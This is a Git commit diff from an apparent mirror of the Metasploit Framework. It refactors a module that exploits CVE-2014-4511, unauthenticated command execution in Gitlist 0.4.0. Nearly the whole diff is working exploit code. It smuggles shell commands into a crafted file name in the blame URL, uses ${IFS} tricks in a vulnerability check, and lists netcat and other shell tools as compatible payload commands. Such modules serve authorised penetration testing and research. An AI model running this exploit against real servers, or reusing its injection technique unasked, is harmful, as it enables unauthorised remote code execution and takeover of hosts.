infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean code

bug/bundler_fix
jvazquez-r7 2014-07-04 16:40:16 -05:00
parent a33a6dc79d
commit 59881323b9
1 changed files with 45 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

71
modules/exploits/linux/http/gitlist_exec.rb
View File

@ -12,10 +12,11 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Gitlist Unauthenticated Command Execution',
'Name' => 'Gitlist Unauthenticated Remote Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote command execution vulnerability
in version 0.4.0 of Gitlist.
This module exploits an unauthenticated remote command execution vulnerability
in version 0.4.0 of Gitlist. The problem exists in the handling of an specially
crafted file name when trying to blame it.
},
'License' => MSF_LICENSE,
'Privileged' => false,
@ -23,24 +24,24 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_CMD,
'Author' =>
[
'@dronesec', #discovery/poc
'drone', #discovery/poc by @dronesec
'Brandon Perry <bperry.volatile@gmail.com>' #Metasploit module
],
'References' =>
[
['CVE', '2014-4511'],
['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/'],
['EDB', '33929']
['EDB', '33929'],
['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/']
],
'Payload' =>
{
'Space' => 9999, #arbitrary, length of GET request really
'BadChars' => "&\x20",
'Space' => 8192, # max length of GET request really
'BadChars' => "&\x20",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash',
'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl',
}
},
'Targets' =>
@ -58,43 +59,61 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))
repo = get_repo
res = send_command("echo${IFS}" + chk + "|base64${IFS}--decode")
if res && res.body.include?(Rex::Text.decode_base64(chk))
return Exploit::CheckCode::Vulnerable
if repo.nil?
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))
res = send_command(repo, "echo${IFS}" + chk + "|base64${IFS}--decode")
if res && res.body
if res.body.include?(Rex::Text.decode_base64(chk))
return Exploit::CheckCode::Vulnerable
elsif res.body.to_s =~ /sh.*not found/
return Exploit::CheckCode::Vulnerable
end
end
Exploit::CheckCode::Safe
end
def exploit
send_command(payload.encoded)
repo = get_repo
if repo.nil?
fail_with(Failure::Unknown, "#{peer} - Failed to retrieve the remote repository")
end
send_command(repo, payload.encoded)
end
def send_command(cmd)
def get_repo
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
'uri' => normalize_uri(target_uri.path, "/")
})
unless res
fail_with("Server did not respond in an expected way")
return nil
end
first = /href="\/gitlist\/(.*)\/"/.match(res.body)
first_repo = /href="\/gitlist\/(.*)\/"/.match(res.body)
unless first && first.length >= 2
fail_with("We don't have a properly configured Gitlist installation")
unless first_repo && first_repo.length >= 2
return nil
end
first = first[1]
repo_name = first_repo[1]
repo_name
end
def send_command(repo, cmd)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, first, 'blame', 'master', '""`' + cmd + '`')
})
'uri' => normalize_uri(target_uri.path, repo, 'blame', 'master', '""`' + cmd + '`')
}, 1)
return res
res
end
end